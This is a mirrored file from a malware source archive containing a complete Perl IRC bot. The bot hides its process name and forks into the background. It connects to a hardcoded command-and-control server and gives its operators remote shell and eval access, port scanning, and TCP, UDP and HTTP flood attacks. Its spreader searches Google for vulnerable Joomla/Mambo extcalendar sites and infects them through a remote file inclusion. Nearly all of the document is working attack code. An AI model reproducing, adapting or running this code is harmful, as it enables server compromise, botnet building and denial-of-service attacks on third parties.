mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-24 07:58:36 +00:00
516 lines
16 KiB
Plaintext
516 lines
16 KiB
Plaintext
# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
|
|
# ------[eoff = End Of Fucking Files]-----
|
|
|
|
|
|
|
|
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
|
|
|
|
|
|
my $processo = 'httpsl';
|
|
|
|
# Bermula Disini
|
|
|
|
my @titi = ("afrika-");
|
|
|
|
my $sleep='5';
|
|
my $linas_max='4';
|
|
my @adms=("xx","ok","mos", "Boss_xx", "KKTeam", "KaHiN");
|
|
my @hostauth=("fbi.gov");
|
|
my @canais=("#mambo");
|
|
my $nick= $titi[rand scalar @titi];
|
|
my $ircname = $titi[rand scalar @titi];
|
|
chop (my $realname = $titi[rand scalar @titi]);
|
|
|
|
$servidor='xx.albap0wer.com' unless $servidor;
|
|
my $porta='8555';
|
|
my $versi_saya = '1.0';
|
|
$SIG{'INT'} = 'IGNORE';
|
|
$SIG{'HUP'} = 'IGNORE';
|
|
$SIG{'TERM'} = 'IGNORE';
|
|
$SIG{'CHLD'} = 'IGNORE';
|
|
$SIG{'PS'} = 'IGNORE';
|
|
use IO::Socket;
|
|
use Socket;
|
|
use IO::Select;
|
|
chdir("/");
|
|
$servidor="$ARGV[0]" if $ARGV[0];
|
|
$0="$processo"."\0"x16;;
|
|
my $pid=fork;
|
|
exit if $pid;
|
|
die "Problema com o fork: $!" unless defined($pid);
|
|
|
|
our %irc_servers;
|
|
our %DCC;
|
|
my $dcc_sel = new IO::Select->new();
|
|
|
|
$sel_cliente = IO::Select->new();
|
|
sub sendraw {
|
|
if ($#_ == '1') {
|
|
my $socket = $_[0];
|
|
print $socket "$_[1]\n";
|
|
} else {
|
|
print $IRC_cur_socket "$_[0]\n";
|
|
}
|
|
}
|
|
|
|
sub conectar {
|
|
my $meunick = $_[0];
|
|
my $servidor_con = $_[1];
|
|
my $porta_con = $_[2];
|
|
|
|
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
|
|
if (defined($IRC_socket)) {
|
|
$IRC_cur_socket = $IRC_socket;
|
|
|
|
$IRC_socket->autoflush(1);
|
|
$sel_cliente->add($IRC_socket);
|
|
|
|
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
|
|
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
|
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
|
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
|
|
nick("$meunick");
|
|
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
|
|
sleep 1;
|
|
}
|
|
}
|
|
my $line_temp;
|
|
while( 1 ) {
|
|
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
|
|
delete($irc_servers{''}) if (defined($irc_servers{''}));
|
|
my @ready = $sel_cliente->can_read(0);
|
|
next unless(@ready);
|
|
foreach $fh (@ready) {
|
|
$IRC_cur_socket = $fh;
|
|
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
|
|
$nread = sysread($fh, $msg, 4096);
|
|
if ($nread == 0) {
|
|
$sel_cliente->remove($fh);
|
|
$fh->close;
|
|
delete($irc_servers{$fh});
|
|
}
|
|
@lines = split (/\n/, $msg);
|
|
|
|
for(my $c=0; $c<= $#lines; $c++) {
|
|
$line = $lines[$c];
|
|
$line=$line_temp.$line if ($line_temp);
|
|
$line_temp='';
|
|
$line =~ s/\r$//;
|
|
unless ($c == $#lines) {
|
|
parse("$line");
|
|
} else {
|
|
if ($#lines == 0) {
|
|
parse("$line");
|
|
} elsif ($lines[$c] =~ /\r$/) {
|
|
parse("$line");
|
|
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
|
|
parse("$line");
|
|
} else {
|
|
$line_temp = $line;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
sub parse {
|
|
my $servarg = shift;
|
|
if ($servarg =~ /^PING \:(.*)/) {
|
|
sendraw("PONG :$1");
|
|
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
|
|
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
|
|
if ($args =~ /^\001VERSION\001$/) {
|
|
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
|
|
}
|
|
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
|
|
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
|
|
if ($onde eq "$meunick"){
|
|
shell("$pn", "$args");
|
|
}
|
|
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
|
|
my $natrix = $1;
|
|
my $arg = $2;
|
|
if ($arg =~ /^\!(.*)/) {
|
|
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
|
|
} elsif ($arg =~ /^\@(.*)/) {
|
|
$ondep = $onde;
|
|
$ondep = $pn if $onde eq $meunick;
|
|
bfunc("$ondep","$1");
|
|
} else {
|
|
shell("$onde", "$arg");
|
|
}
|
|
}
|
|
}
|
|
}
|
|
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
|
|
if (lc($1) eq lc($meunick)) {
|
|
$meunick=$4;
|
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
|
}
|
|
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
|
|
nick("$meunick|".int rand(999999));
|
|
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
|
|
$meunick = $2;
|
|
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
|
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
|
|
foreach my $canal (@canais) {
|
|
sendraw("JOIN $canal ddosit");
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
sub bfunc {
|
|
my $printl = $_[0];
|
|
my $funcarg = $_[1];
|
|
if (my $pid = fork) {
|
|
waitpid($pid, 0);
|
|
} else {
|
|
if (fork) {
|
|
exit;
|
|
} else {
|
|
if ($funcarg =~ /^portscan (.*)/) {
|
|
my $hostip="$1";
|
|
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
|
|
my (@aberta, %porta_banner);
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
|
|
foreach my $porta (@portas) {
|
|
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
|
|
if ($scansock) {
|
|
push (@aberta, $porta);
|
|
$scansock->close;
|
|
}
|
|
}
|
|
|
|
if (@aberta) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
|
|
} else {
|
|
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
|
|
}
|
|
}
|
|
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
|
|
my $itime = time;
|
|
my ($cur_time);
|
|
$cur_time = time - $itime;
|
|
while ($3>$cur_time){
|
|
$cur_time = time - $itime;
|
|
&tcpflooder("$1","$2","$3");
|
|
}
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
|
|
}
|
|
if ($funcarg =~ /^version/) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);
|
|
}
|
|
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
|
|
srand;
|
|
my $itime = time;
|
|
my ($cur_time);
|
|
my ($exploited);
|
|
$boturl=$2;
|
|
$cur_time = time - $itime;$exploited = 0;
|
|
while($1>$cur_time){
|
|
$cur_time = time - $itime;
|
|
@urls=fetch();
|
|
foreach $url (@urls) {
|
|
$cur_time = time - $itime;
|
|
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
|
|
$url =$path."components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=$boturl?";
|
|
$page = http_query($url);
|
|
$exploited = $exploited + 1;
|
|
}
|
|
}
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
|
|
}
|
|
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
|
|
my $itime = time;
|
|
my ($cur_time);
|
|
$cur_time = time - $itime;
|
|
while ($2>$cur_time){
|
|
$cur_time = time - $itime;
|
|
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
|
|
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
|
|
close($socket);
|
|
}
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
|
|
}
|
|
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
|
|
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
|
|
$dtime = 1 if $dtime == 0;
|
|
my %bytes;
|
|
$bytes{igmp} = $2 * $pacotes{igmp};
|
|
$bytes{icmp} = $2 * $pacotes{icmp};
|
|
$bytes{o} = $2 * $pacotes{o};
|
|
$bytes{udp} = $2 * $pacotes{udp};
|
|
$bytes{tcp} = $2 * $pacotes{tcp};
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
|
|
}
|
|
exit;
|
|
}
|
|
}
|
|
}
|
|
|
|
sub ircase {
|
|
my ($kem, $printl, $case) = @_;
|
|
|
|
if ($case =~ /^join (.*)/) {
|
|
j("$1");
|
|
}
|
|
if ($case =~ /^part (.*)/) {
|
|
p("$1");
|
|
}
|
|
if ($case =~ /^rejoin\s+(.*)/) {
|
|
my $chan = $1;
|
|
if ($chan =~ /^(\d+) (.*)/) {
|
|
for (my $ca = 1; $ca <= $1; $ca++ ) {
|
|
p("$2");
|
|
j("$2");
|
|
}
|
|
} else {
|
|
p("$chan");
|
|
j("$chan");
|
|
}
|
|
}
|
|
if ($case =~ /^op/) {
|
|
op("$printl", "$kem") if $case eq "op";
|
|
my $oarg = substr($case, 3);
|
|
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
|
}
|
|
if ($case =~ /^deop/) {
|
|
deop("$printl", "$kem") if $case eq "deop";
|
|
my $oarg = substr($case, 5);
|
|
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
|
}
|
|
if ($case =~ /^msg\s+(\S+) (.*)/) {
|
|
msg("$1", "$2");
|
|
}
|
|
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
|
|
for (my $cf = 1; $cf <= $1; $cf++) {
|
|
msg("$2", "$3");
|
|
}
|
|
}
|
|
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
|
|
ctcp("$1", "$2");
|
|
}
|
|
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
|
|
for (my $cf = 1; $cf <= $1; $cf++) {
|
|
ctcp("$2", "$3");
|
|
}
|
|
}
|
|
if ($case =~ /^nick (.*)/) {
|
|
nick("$1");
|
|
}
|
|
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
|
|
conectar("$2", "$1", 6667);
|
|
}
|
|
if ($case =~ /^raw (.*)/) {
|
|
sendraw("$1");
|
|
}
|
|
if ($case =~ /^eval (.*)/) {
|
|
eval "$1";
|
|
}
|
|
}
|
|
|
|
sub shell {
|
|
my $printl=$_[0];
|
|
my $comando=$_[1];
|
|
if ($comando =~ /cd (.*)/) {
|
|
chdir("$1") || msg("$printl", "No such file or directory");
|
|
return;
|
|
}
|
|
elsif ($pid = fork) {
|
|
waitpid($pid, 0);
|
|
} else {
|
|
if (fork) {
|
|
exit;
|
|
} else {
|
|
my @resp=`$comando 2>&1 3>&1`;
|
|
my $c=0;
|
|
foreach my $linha (@resp) {
|
|
$c++;
|
|
chop $linha;
|
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
|
|
if ($c == "$linas_max") {
|
|
$c=0;
|
|
sleep $sleep;
|
|
}
|
|
}
|
|
exit;
|
|
}
|
|
}
|
|
}
|
|
|
|
sub tcpflooder {
|
|
my $itime = time;
|
|
my ($cur_time);
|
|
my ($ia,$pa,$proto,$j,$l,$t);
|
|
$ia=inet_aton($_[0]);
|
|
$pa=sockaddr_in($_[1],$ia);
|
|
$ftime=$_[2];
|
|
$proto=getprotobyname('tcp');
|
|
$j=0;$l=0;
|
|
$cur_time = time - $itime;
|
|
while ($l<1000){
|
|
$cur_time = time - $itime;
|
|
last if $cur_time >= $ftime;
|
|
$t="SOCK$l";
|
|
socket($t,PF_INET,SOCK_STREAM,$proto);
|
|
connect($t,$pa)||$j--;
|
|
$j++;$l++;
|
|
}
|
|
$l=0;
|
|
while ($l<1000){
|
|
$cur_time = time - $itime;
|
|
last if $cur_time >= $ftime;
|
|
$t="SOCK$l";
|
|
shutdown($t,2);
|
|
$l++;
|
|
}
|
|
}
|
|
|
|
sub udpflooder {
|
|
my $iaddr = inet_aton($_[0]);
|
|
my $msg = 'A' x $_[1];
|
|
my $ftime = $_[2];
|
|
my $cp = 0;
|
|
my (%pacotes);
|
|
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
|
|
|
|
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
|
|
|
|
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
|
|
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
|
|
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
|
|
return(undef) if $cp == 4;
|
|
my $itime = time;
|
|
my ($cur_time);
|
|
while ( 1 ) {
|
|
for (my $porta = 1; $porta <= 65000; $porta++) {
|
|
$cur_time = time - $itime;
|
|
last if $cur_time >= $ftime;
|
|
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
|
|
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
|
|
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
|
|
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
|
|
|
|
for (my $pc = 3; $pc <= 255;$pc++) {
|
|
next if $pc == 6;
|
|
$cur_time = time - $itime;
|
|
last if $cur_time >= $ftime;
|
|
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
|
|
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
|
|
}
|
|
}
|
|
last if $cur_time >= $ftime;
|
|
}
|
|
return($cur_time, %pacotes);
|
|
}
|
|
|
|
sub ctcp {
|
|
return unless $#_ == 1;
|
|
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
|
|
}
|
|
sub msg {
|
|
return unless $#_ == 1;
|
|
sendraw("PRIVMSG $_[0] :$_[1]");
|
|
}
|
|
sub notice {
|
|
return unless $#_ == 1;
|
|
sendraw("NOTICE $_[0] :$_[1]");
|
|
}
|
|
sub op {
|
|
return unless $#_ == 1;
|
|
sendraw("MODE $_[0] +o $_[1]");
|
|
}
|
|
sub deop {
|
|
return unless $#_ == 1;
|
|
sendraw("MODE $_[0] -o $_[1]");
|
|
}
|
|
sub j { &join(@_); }
|
|
sub join {
|
|
return unless $#_ == 0;
|
|
sendraw("JOIN $_[0]");
|
|
}
|
|
sub p { part(@_); }
|
|
sub part {
|
|
sendraw("PART $_[0]");
|
|
}
|
|
sub nick {
|
|
return unless $#_ == 0;
|
|
sendraw("NICK $_[0]");
|
|
}
|
|
sub quit {
|
|
sendraw("QUIT :$_[0]");
|
|
}
|
|
|
|
# Spreader
|
|
# this 'spreader' code isnot mine, i dont know who coded it.
|
|
# update: well, i just fix0red this shit a bit.
|
|
#
|
|
|
|
sub fetch(){
|
|
my $rnd=(int(rand(9999)));
|
|
my $n= 80;
|
|
if ($rnd<5000) { $n<<=1;}
|
|
my $s= (int(rand(10)) * $n);
|
|
|
|
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
|
|
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
|
|
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
|
|
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
|
|
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
|
|
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
|
|
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
|
|
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
|
|
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
|
|
"vu","vn","ye","yu","cd","zm","zw","");
|
|
my @str;
|
|
|
|
foreach $dom (@dominios)
|
|
{
|
|
push (@str,"%22com_extcalendar%22+inurl%3Aindex.php?option=com_extcalendar+site%3A&".$dom."%20");
|
|
}
|
|
|
|
my $query="www.google.co.uk/search?q=";
|
|
$query.=$str[(rand(scalar(@str)))];
|
|
$query.="hl=en&lr=&start=$&sa=N";
|
|
my @lst=();
|
|
my $page = http_query($query);
|
|
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
|
|
if ($1 !~ m/google|cache|translate/){
|
|
push (@lst,$1);
|
|
}
|
|
}
|
|
return (@lst);
|
|
}
|
|
|
|
sub http_query($){
|
|
my ($url) = @_;
|
|
my $host=$url;
|
|
my $query=$url;
|
|
my $page="";
|
|
$host =~ s/href=\"?http:\/\///;
|
|
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
|
|
$query =~s/$host//;
|
|
if ($query eq "") {$query="/";};
|
|
eval {
|
|
local $SIG{ALRM} = sub { die "1";};
|
|
alarm 10;
|
|
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
|
|
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
|
|
my @r = <$sock>;
|
|
$page="@r";
|
|
alarm 0;
|
|
close($sock);
|
|
};
|
|
return $page;
|
|
|
|
}
|
|
|
|
|
|
|
|
|